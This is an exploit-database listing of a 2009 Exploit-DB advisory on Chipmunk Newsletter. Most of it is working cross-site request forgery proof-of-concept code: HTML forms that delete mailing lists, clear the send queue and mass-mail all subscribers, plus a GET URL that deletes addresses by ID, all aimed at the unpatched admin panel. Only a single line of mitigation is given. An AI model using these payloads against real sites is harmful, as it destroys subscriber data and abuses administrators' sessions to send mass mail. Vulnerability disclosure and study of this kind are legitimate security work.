header-logo
Suggest Exploit
vendor:
Newsletter
by:
Milos Zivanovic
3.3
CVSS
MEDIUM
Cross Site Request Forgery
352
CWE
Product Name: Newsletter
Affected Version From: the only one there is
Affected Version To: the only one there is
Patch Exists: NO
Related CWE: N/A
CPE: chipmunk-scripts.com/newsletter/newsletter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Chipmunk Newsletter CSRF Vulnerabilities

I've noticed one XSS exploit was found by someone else so i decided to check it a little bit more and i found some sweet CSRF exploits in admin panel. The exploits include CSRF Delete Email List, CSRF Clear Queue, CSRF Send letter, and CSRF Delete Email by ID.

Mitigation:

Implementing a CSRF token in the application can help prevent CSRF attacks.
Source

Exploit-DB raw data:

[-------------------------------------------------------------------------------------------------]
[   Title: Chipmunk Newsletter CSRF Vulnerabilities                                               ]
[   Author: Milos Zivanovic                                                                       ]
[   Date: 11. December 2009.                                                                      ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[   Application: Chipmunk Newsletter                                                              ]
[   Version: the only one there is                                                                ]
[   Download: http://www.chipmunk-scripts.com/newsletter/newsletter.zip                           ]
[   Vulnerability: Cross Site Request Forgery                                                     ]
[-------------------------------------------------------------------------------------------------]

I've noticed one XSS exploit was found by someone else so i decided to check it a little bit more
and i found some sweet CSRF exploits in admin panel.

[#]Content
 |--CSRF Delete Email List (also will remove all mails subscribed to this list)
 |--CSRF Clear Queue (Set all send to zero?)
 |--CSRF Send letter (this will mass mail all mails in database)
 |--CSRF Delete Email by ID

[-]CSRF Delete Email List (also will remove all mails subscribed to this list)

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/newsletter/admin/dellist.php" method="POST">
  <select name='lists'>
    <option value='3'>newsletter_list</option>
  </select>
  <input type='submit' name='submit' value='Delete'>
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[-]CSRF Clear Queue (Set all send to zero?)

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/newsletter/admin/clearqueue.php" method="POST">
  <input type="submit" name="submit">
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[-]CSRF Send letter (this will mass mail all mails in database)

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/newsletter/admin/sendletter.php" method="POST">
  <input type='text' name='subject' value="Mail Subject">
  <select name='lists'>
    <option value='0' selected>All</option>
  </select>
  <textarea name='nletter' rows='8' cols='60' id='7'>Mail message here&lt;/textarea&gt;
  
  <input type='submit' name='submit' value='submit'>
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[-]CSRF Delete Email by ID

[POC----------------------------------------------------------------------------------------------]
http://localhost/newsletter/admin/deleteadd.php?ID=[ID]
[POC----------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[                                              EOF                                                ]
[-------------------------------------------------------------------------------------------------]

Navigation

Suggest Exploit

Services By CQR